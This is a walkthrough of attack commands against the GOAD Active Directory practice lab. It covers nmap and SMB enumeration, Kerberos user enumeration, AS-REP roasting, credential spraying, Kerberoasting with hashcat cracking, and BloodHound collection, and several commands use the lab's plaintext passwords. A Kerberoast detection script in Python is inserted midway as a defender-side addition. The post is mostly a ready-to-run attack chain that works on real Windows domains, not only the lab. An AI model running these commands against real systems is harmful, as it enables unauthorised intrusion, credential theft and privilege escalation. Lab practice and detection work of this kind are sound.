GOAD writeups I’ve seen are outdated, and several of their commands no longer work on current Kali builds. This post provides working, tested command examples that match the latest tool versions and a typical GOAD lab topology; all of them were validated on a fresh Kali install. In this lab 10.3.10.10 is kingslanding (sevenkingdoms.local), 10.3.10.11 is winterfell (north.sevenkingdoms.local) and 10.3.10.12 is meereen (essos.local); adjust the addresses to your own deployment.
1. Initial Network and Service Enumeration
nmap -Pn -p- -sC -sV -oA full_scan_goad 10.3.10.10-12,22-23
2. SMB Enumeration
crackmapexec smb 10.3.10.11 --users
crackmapexec smb 10.3.10.11 --pass-pol
enum4linux 10.3.10.11
rpcclient -U 'NORTH\' -N 10.3.10.11
net rpc group members 'Domain Users' -W 'NORTH' -I '10.3.10.11' -U '%'
3. Generating Userlists from Game of Thrones Cast Data
curl -s https://www.hbo.com/game-of-thrones/cast-and-crew | \
grep 'href="/game-of-thrones/cast-and-crew/' | \
grep -o 'aria-label="[^"]*"' | cut -d '"' -f 2 | \
awk '{if($2 == "") {print tolower($1)} else {print tolower($1) "." tolower($2);} }' \
> got_users.txt
4. Kerberos User Enumeration
nmap -p 88 --script=krb5-enum-users --script-args="krb5-enum-users.realm='sevenkingdoms.local',userdb=got_users.txt" 10.3.10.10
nmap -p 88 --script=krb5-enum-users --script-args="krb5-enum-users.realm='essos.local',userdb=got_users.txt" 10.3.10.12
nmap -p 88 --script=krb5-enum-users --script-args="krb5-enum-users.realm='north.sevenkingdoms.local',userdb=got_users.txt" 10.3.10.11
5. Authenticated SMB Enumeration
crackmapexec smb -u khal.drogo -p horse -d essos.local 10.3.10.12 --users
crackmapexec smb 10.3.10.10-23 -u 'a' -p '' --shares
6. AS-REP Roasting and Password Attacks
impacket-GetNPUsers north.sevenkingdoms.local/ -no-pass -usersfile sevenkingdoms_users.txt -outputfile asrep.hashes
Unpack the wordlist once, then crack the AS-REP hashes (hashcat mode 18200):
sudo gunzip /usr/share/wordlists/rockyou.txt.gz
sudo chown kali:kali /usr/share/wordlists/rockyou.txt
hashcat -m 18200 asrep.hashes /usr/share/wordlists/rockyou.txt
7. Broad Credential Spray
crackmapexec smb 10.3.10.11 -u sevenkingdoms_users.txt -p sevenkingdoms_users.txt --no-bruteforce
8. Full AD User Enumeration
impacket-GetADUsers -all north.sevenkingdoms.local/brandon.stark:iseedeadpeople
9. LDAP Enumeration
ldapsearch -H ldap://10.3.10.11 -D "brandon.stark@north.sevenkingdoms.local" -w iseedeadpeople -b 'DC=north,DC=sevenkingdoms,DC=local' "(&(objectCategory=person)(objectClass=user))" | grep 'distinguishedName:'
ldapsearch -H ldap://10.3.10.12 -D "brandon.stark@north.sevenkingdoms.local" -w iseedeadpeople -b 'DC=essos,DC=local' "(&(objectCategory=person)(objectClass=user))"
ldapsearch -H ldap://10.3.10.10 -D "brandon.stark@north.sevenkingdoms.local" -w iseedeadpeople -b 'DC=sevenkingdoms,DC=local' "(&(objectCategory=person)(objectClass=user))"
10. Kerberoasting
impacket-GetUserSPNs -request -dc-ip 10.3.10.11 north.sevenkingdoms.local/brandon.stark:iseedeadpeople -outputfile kerberoasting.hashes
If Kerberos rejects the request with a clock skew error, sync your clock against the DC:
sudo apt install ntpdate -y
sudo ntpdate 10.3.10.11
Then rerun:
impacket-GetUserSPNs north.sevenkingdoms.local/brandon.stark:iseedeadpeople -dc-ip 10.3.10.11 -request
Crack the hashes:
hashcat -m 13100 -a 0 kerberoasting.hashes /usr/share/wordlists/rockyou.txt --force
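As an added defender-side example (not from the original post), the following Python detection logic runs over a constructed export of Windows Security event 4769 (service ticket requested) and flags the pattern a `-request` Kerberoast run leaves behind: one account requesting service tickets for several user-account SPNs within seconds, often with RC4 (etype 0x17). Account and SPN names follow the GOAD lab; the timestamps, the 10.3.10.50 source address and the thresholds are assumptions.

```python
from collections import defaultdict
from datetime import datetime, timedelta

# Constructed sample of event 4769 fields as a SIEM might export them.
# Lab names follow GOAD; the 10.3.10.50 client address is an assumed attacker host.
SAMPLE_4769 = [
    # (TimeCreated, TargetUserName, ServiceName, IpAddress, TicketEncryptionType)
    ("2024-05-01T10:00:01", "brandon.stark@NORTH.SEVENKINGDOMS.LOCAL", "WINTERFELL$", "10.3.10.11", "0x12"),
    ("2024-05-01T10:00:03", "brandon.stark@NORTH.SEVENKINGDOMS.LOCAL", "krbtgt", "10.3.10.11", "0x12"),
    ("2024-05-01T10:05:10", "brandon.stark@NORTH.SEVENKINGDOMS.LOCAL", "jon.snow", "10.3.10.50", "0x17"),
    ("2024-05-01T10:05:10", "brandon.stark@NORTH.SEVENKINGDOMS.LOCAL", "sansa.stark", "10.3.10.50", "0x17"),
    ("2024-05-01T10:05:11", "brandon.stark@NORTH.SEVENKINGDOMS.LOCAL", "sql_svc", "10.3.10.50", "0x17"),
    ("2024-05-01T11:30:00", "eddard.stark@NORTH.SEVENKINGDOMS.LOCAL", "WINTERFELL$", "10.3.10.22", "0x12"),
]

RC4_HMAC = "0x17"  # TicketEncryptionType value for RC4-HMAC, the roaster's preferred etype


def is_user_spn(service_name):
    """Computer accounts (trailing $) and krbtgt are normal ticket targets;
    user accounts carrying an SPN are what a Kerberoast harvests."""
    return not service_name.endswith("$") and service_name.lower() != "krbtgt"


def detect_kerberoast(events, window_seconds=60, min_distinct_spns=3):
    """Return one alert per (requesting account, source IP) that asked for tickets to
    >= min_distinct_spns distinct user-account SPNs inside window_seconds, or that asked
    for any user-account SPN ticket with RC4 encryption."""
    by_source = defaultdict(list)
    for ts, user, service, ip, etype in events:
        if is_user_spn(service):
            by_source[(user, ip)].append((datetime.fromisoformat(ts), service, etype))
    alerts = []
    for (user, ip), reqs in by_source.items():
        reqs.sort()
        rc4 = sorted({s for _, s, e in reqs if e == RC4_HMAC})
        burst = []
        for i, (t, _, _) in enumerate(reqs):  # sliding window over time-ordered requests
            seen = {s for t2, s, _ in reqs[i:] if t2 - t <= timedelta(seconds=window_seconds)}
            if len(seen) > len(burst):
                burst = sorted(seen)
        if len(burst) >= min_distinct_spns or rc4:
            alerts.append({"account": user, "source_ip": ip,
                           "spns_in_window": burst, "rc4_spns": rc4})
    return alerts


if __name__ == "__main__":
    for alert in detect_kerberoast(SAMPLE_4769):
        print(alert)
```

Tune `min_distinct_spns` to the number of SPN-bearing user accounts in your domain; in a small lab like GOAD even three distinct requests from one source in a minute is a strong signal.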
11. Post-Roasting SMB Access
crackmapexec smb 10.3.10.10-23 -u jon.snow -p iknownothing -d north.sevenkingdoms.local --shares
12. ADIDNS Enumeration
git clone https://github.com/dirkjanm/adidnsdump && cd adidnsdump
pip install . --break-system-packages
adidnsdump -u 'north.sevenkingdoms.local\jon.snow' -p 'iknownothing' winterfell.north.sevenkingdoms.local
13. BloodHound Collection
bloodhound-python --zip -c All -d north.sevenkingdoms.local -u brandon.stark -p iseedeadpeople -dc winterfell.north.sevenkingdoms.local -gc winterfell.north.sevenkingdoms.local -ns 10.3.10.11
bloodhound-python --zip -c All -d sevenkingdoms.local -u brandon.stark@north.sevenkingdoms.local -p iseedeadpeople -dc kingslanding.sevenkingdoms.local -gc kingslanding.sevenkingdoms.local -ns 10.3.10.11
bloodhound-python --zip -c All -d essos.local -u brandon.stark@north.sevenkingdoms.local -p iseedeadpeople -dc meereen.essos.local -gc meereen.essos.local -ns 10.3.10.11